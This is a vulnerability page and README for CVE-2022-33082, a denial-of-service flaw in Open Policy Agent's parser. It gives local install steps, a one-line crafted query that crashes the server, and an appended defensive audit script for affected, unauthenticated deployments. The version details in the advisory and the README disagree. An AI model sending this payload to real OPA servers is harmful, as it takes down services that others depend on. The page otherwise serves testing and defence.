CVE-2022-33082 PoC — Open Policy Agent security vulnerability

Source
Associated Vulnerability
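Title: Open Policy Agent security vulnerability (CVE-2022-33082)
Description: Open Policy Agent is an open-source, general-purpose policy engine that enables unified, context-aware policy enforcement across the entire stack. Open Policy Agent v0.10.2 contains a security vulnerability: an issue in the AST parser (ast/compile.go) allows an attacker to cause a denial of service (DoS) via crafted input.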
Readme
# CVE 2022-33082 Exploit

## DISCLAIMER
### This code is provided for **ETHICAL** purposes - understanding the vulnerability and testing one's own systems or AUTHORIZED systems. By using this, you agree to act ethically and I hold no liability if you do not act ethically.

### This exploit works on Open Policy Agent (OPA) versions 0.41.0 and lower. Install an OPA instance on Linux to test with this command:
```
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
```

### Then, navigate to localhost:8181 on your web browser. Input the below into the respective fields

query field (go code):
```
p := [input() | input := 1]
```

```
{ "input":"put this in the input (json) field!" }
```
### The website will then crash and the terminal running the server will report a kernel panic

## Implications
### Anyone with web access to an OPA server version 0.41.0 or lower can completely crash the server. This server is not password protected by default.
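
A defensive check for the two conditions named above (an affected version and a server running without authentication), added here as an example and not part of the original README. `--authentication` and `--authorization` are `opa run` flags; the function names, finding labels and sample strings are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag OPA deployments matching the conditions in this README.
# Inputs are plain strings so the audit runs offline; sample values are constructed.
LAST_AFFECTED="0.41.0"   # README: "versions 0.41.0 and lower"

# Pull the version number out of `opa version` output ("Version: X.Y.Z").
opa_version_from_output() {
    printf '%s\n' "$1" |
        sed -n 's/^Version:[[:space:]]*v\{0,1\}\([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# Return 0 when dotted version $1 <= $2 (numeric, component by component).
version_le() {
    a=$1 b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*} y=${b%%.*}
        [ "${x:-0}" -lt "${y:-0}" ] && return 0
        [ "${x:-0}" -gt "${y:-0}" ] && return 1
        case $a in *.*) a=${a#*.} ;; *) a= ;; esac
        case $b in *.*) b=${b#*.} ;; *) b= ;; esac
    done
    return 0
}

# Print one finding per line for `opa version` output ($1) and an `opa run` command line ($2).
audit_opa() {
    ver=$(opa_version_from_output "$1")
    cmd=" $(printf '%s' "$2" | tr '=' ' ') "   # treat --flag=value like --flag value
    if [ -z "$ver" ]; then echo "UNKNOWN_VERSION"
    elif version_le "$ver" "$LAST_AFFECTED"; then echo "AFFECTED_VERSION $ver"
    fi
    case $cmd in *" --server "*|*" -s "*) ;; *) return 0 ;; esac   # no REST API listener
    case $cmd in
        *" --authentication token "*|*" --authentication tls "*) ;;
        *) echo "NO_AUTHENTICATION" ;;
    esac
    case $cmd in *" --authorization basic "*) ;; *) echo "NO_AUTHORIZATION" ;; esac
}

# Constructed sample: the setup from the README's install steps.
SAMPLE_VERSION_OUTPUT='Version: 0.41.0
Go Version: go1.18.3'
audit_opa "$SAMPLE_VERSION_OUTPUT" "./opa run --server"
```

On a real host, pass the output of `opa version` and the server's actual command line (for example from the service unit) as the two arguments.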